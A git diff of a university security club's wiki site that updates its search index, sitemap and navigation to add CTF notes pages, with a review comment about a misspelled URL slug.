bd3\u5b66\u4e8e\u8d5b\uff0c\u4ee5\u8d5b\u4fc3\u5b66\u201d\u7684\u7406\u5ff5\uff0c\u65e8\u5728\u4fc3\u8fdb\u4e2d\u56fd\u9ad8\u6821\u7f51\u5b89\u6559\u5b66\u6c34\u5e73\u7684\u63d0\u9ad8\u548c\u7f51\u5b89\u4eba\u624d\u7684\u53d1\u73b0\u3002
\u6211\u4eec\u534f\u4f1a\u7684CodeMonster
\u6218\u961f\u9996\u6b21\u53c2\u52a0\u672c\u6b21\u6bd4\u8d5b\uff0c\u53d6\u5f97\u4e86\u7ebf\u4e0a\u8d5b\u5168\u56fd\u7b2c9\u540d
\u7684\u6210\u7ee9\u3002
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/dfd03705-8ad1-420f-8534-0fd4086165e7/#_1","title":"\u6bd4\u8d5b\u56fe\u7247","text":"\u6bd4\u8d5b\u671f\u95f4\u622a\u56fe,\u4e00\u5ea6\u5360\u9886\u699c\u4e00
\uff1a
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/f72cbee7-1294-46b9-92e3-49a3140255b2/","title":"2017 \u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u4f01\u4e1a\u8d5b\u534e\u5357\u8d5b\u533a \u4e09\u7b49\u5956\uff08\u7b2c3\u540d\uff09","text":"\u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b
\u662f\u4e00\u9879\u9762\u5411\u5927\u5b66\u751f\u7684\u516c\u76ca\u6027\u79d1\u6280\u7c7b\u7ade\u8d5b\uff0c\u7531\u4e2d\u56fd\u4fe1\u606f\u4ea7\u4e1a\u5546\u4f1a\u4fe1\u606f\u5b89\u5168\u4ea7\u4e1a\u5206\u4f1a\u53d1\u8d77\u4e3b\u529e\uff0c\u901a\u8fc7\u6574\u5408\u4fe1\u606f\u5b89\u5168\u4ea7\u4e1a\u8d44\u6e90\u5bf9\u63a5\u9ad8\u6821\uff0c\u4e3a\u5927\u5b66\u751f\u63d0\u4f9b\u4e00\u4e2a\u8fdb\u884c\u4fe1\u606f\u5b89\u5168\u6280\u672f\u521b\u65b0\u3001\u6df1\u5165\u4ea7\u4e1a\u884c\u4e1a\u5e94\u7528\u4ee5\u53ca\u6269\u5c55\u5b89\u5168\u89c6\u91ce\u7684\u5e73\u53f0\uff0c\u63a8\u52a8\u6821\u4f01\u5408\u4f5c\u6a21\u5f0f\u7684\u4fe1\u606f\u5b89\u5168\u4eba\u624d\u57f9\u517b\uff0c\u4ece\u800c\u5b9e\u73b0\u4fe1\u606f\u5b89\u5168\u4f18\u79c0\u4eba\u624d\u7684\u57f9\u517b\u548c\u9009\u62e8\u6e20\u9053\u3002
\u5927\u8d5b\u5f3a\u8c03\u8d34\u8fd1\u5b9e\u6218\uff0c\u4ee5\u4fe1\u606f\u5b89\u5168\u5178\u578b\u884c\u4e1a\u5e94\u7528\u573a\u666f\u4e3a\u5927\u8d5b\u73af\u5883\uff0c\u91cd\u70b9\u68c0\u9a8c\u53c2\u8d5b\u5b66\u751f\u9762\u5bf9\u771f\u5b9e\u73af\u5883\u4e0b\u7684\u4fe1\u606f\u5b89\u5168\u5de5\u7a0b\u80fd\u529b\u548c\u653b\u9632\u6280\u672f\u80fd\u529b\u3002
\u5927\u8d5b\u5f3a\u8c03\u4f01\u4e1a\u4e0e\u9ad8\u6821\u7684\u8054\u5408\uff0c\u901a\u8fc7\u6821\u4f01\u5bf9\u63a5\u7684\u4f01\u4e1a\u5bfc\u5e08\u52a0\u5b66\u751f\u6218\u961f\u7684\u6a21\u5f0f\uff0c\u5c06\u4f01\u4e1a\u8d44\u6e90\u7eb3\u5165\u5230\u9ad8\u6821\u7684\u4fe1\u606f\u5b89\u5168\u76f8\u5173\u4e13\u4e1a\u4eba\u624d\u57f9\u517b\u4e2d\uff0c\u5e76\u5b9e\u73b0\u4eba\u624d\u4ece\u9ad8\u6821\u5230\u4f01\u4e1a\u7684\u65e0\u7f1d\u5bf9\u63a5\u3002
\u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u4e3a\u4e00\u9879\u5468\u671f\u4e3a\u4e00\u5e74\u7684\u5168\u56fd\u6027\u8054\u8d5b\u8d5b\u4e8b\uff0c\u7531\u591a\u4e2a\u533a\u57df\u5206\u7ad9\u8d5b\u548c\u5e74\u5ea6\u603b\u51b3\u8d5b\u7ec4\u6210\u3002
\u672c\u534f\u4f1a\u7684CodeMonster
\u6218\u961f\u8363\u83b7\u7b2c\u4e09\u540d\uff0c\u62ff\u4e0b\u4e09\u7b49\u59565000\u5143\u5956\u91d1\u3002
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/f72cbee7-1294-46b9-92e3-49a3140255b2/#_1","title":"\u6bd4\u8d5b\u56fe\u7247","text":"\u83b7\u5956\u56fe\u7247\uff1a
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"writeup/CISCN-CTF-Quals-2023/","title":"2023\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b\u521d\u8d5bWriteup","text":"11
"}]}
\ No newline at end of file
diff --git a/sitemap.xml b/sitemap.xml
index 28b4288..4528a9c 100755
--- a/sitemap.xml
+++ b/sitemap.xml
@@ -2,92 +2,232 @@
https://wiki.xmutsec.cn/
- 2023-08-07
+ 2023-08-15
daily
https://wiki.xmutsec.cn/award/
- 2023-08-07
+ 2023-08-15
daily
https://wiki.xmutsec.cn/member/
- 2023-08-07
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/CTF-CPYPTO-2/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/CTF-CRYPTO-1/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/CTF-CRYPTO-3/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/CTF-CRYPTO-4/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/CTF-CRYPTO-5/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/CTF-WEB-2/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/CTF-Web-1/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/RSA%E7%AE%97%E6%B3%95%E5%8E%9F%E7%90%86/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/problem-1096-wp/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/problem-1852-wp/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/problem-2026-wp/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/problem-2036-wp/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/problem-2049-wp/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/problem-2074-wp/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/problem-2076-wp/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/problem-2099-wp/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/problem-227-wp/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/problem-2422-wp/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/problem-2602-wp/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/problem-39-wp/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/problem-403-wp/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/problem-404-wp/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/problem-413-wp/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/problem-440-wp/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/problem-442-wp/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/problem-444-wp/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/problem-463-wp/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/problem-47-wp/
+ 2023-08-15
daily
https://wiki.xmutsec.cn/posts/07cb34d3-7c51-43af-bfb2-84425b34c8f4/
- 2023-08-07
+ 2023-08-15
daily
https://wiki.xmutsec.cn/posts/0fbc0fc1-39e4-47ee-9cff-ba792b068f27/
- 2023-08-07
+ 2023-08-15
daily
https://wiki.xmutsec.cn/posts/131885e3-191c-40ac-af0d-79835e15d45b/
- 2023-08-07
+ 2023-08-15
daily
https://wiki.xmutsec.cn/posts/6d1aa499-57ee-401b-a911-8062c6cae869/
- 2023-08-07
+ 2023-08-15
daily
https://wiki.xmutsec.cn/posts/6eba13d5-1e74-4680-8a10-9c18763b6389/
- 2023-08-07
+ 2023-08-15
daily
https://wiki.xmutsec.cn/posts/72c8b299-29e5-4e88-a684-7c65b3931760/
- 2023-08-07
+ 2023-08-15
daily
https://wiki.xmutsec.cn/posts/86e69101-77f4-484a-ba0e-2957afabbdb6/
- 2023-08-07
+ 2023-08-15
daily
https://wiki.xmutsec.cn/posts/9806f2d8-b4ad-48d3-ad34-5481b1e8e35b/
- 2023-08-07
+ 2023-08-15
daily
https://wiki.xmutsec.cn/posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/
- 2023-08-07
+ 2023-08-15
daily
https://wiki.xmutsec.cn/posts/ab21d401-10e1-4021-9936-e7154fd9ed71/
- 2023-08-07
+ 2023-08-15
daily
https://wiki.xmutsec.cn/posts/b6adcea6-60ce-4f44-9389-2a06d34125d8/
- 2023-08-07
+ 2023-08-15
daily
https://wiki.xmutsec.cn/posts/bb168e48-791c-4a1d-83c4-335b9db12499/
- 2023-08-07
+ 2023-08-15
daily
https://wiki.xmutsec.cn/posts/dfd03705-8ad1-420f-8534-0fd4086165e7/
- 2023-08-07
+ 2023-08-15
daily
https://wiki.xmutsec.cn/posts/f72cbee7-1294-46b9-92e3-49a3140255b2/
- 2023-08-07
+ 2023-08-15
daily
https://wiki.xmutsec.cn/writeup/CISCN-CTF-Quals-2023/
- 2023-08-07
+ 2023-08-15
daily
\ No newline at end of file
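Review bot: The added entry `https://wiki.xmutsec.cn/ctfnotes/CTF-CPYPTO-2/` spells its slug `CPYPTO`, while the four sibling entries in this hunk use `CTF-CRYPTO-1`, `-3`, `-4` and `-5`; `CTF-WEB-2` and `CTF-Web-1` also differ in case. The sitemap looks generated from the page file names, so the fix presumably belongs in the source document name, giving `https://wiki.xmutsec.cn/ctfnotes/CTF-CRYPTO-2/` here after a rebuild. Renaming before the URL is crawled avoids needing a redirect later, since a slug change after publication breaks inbound links.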
diff --git a/sitemap.xml.gz b/sitemap.xml.gz
index b0b1393..597caf8 100755
Binary files a/sitemap.xml.gz and b/sitemap.xml.gz differ
diff --git a/writeup/CISCN-CTF-Quals-2023/index.html b/writeup/CISCN-CTF-Quals-2023/index.html
index 0a9cefa..c8fc8fa 100755
--- a/writeup/CISCN-CTF-Quals-2023/index.html
+++ b/writeup/CISCN-CTF-Quals-2023/index.html
@@ -229,6 +229,22 @@
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
@@ -648,6 +664,433 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+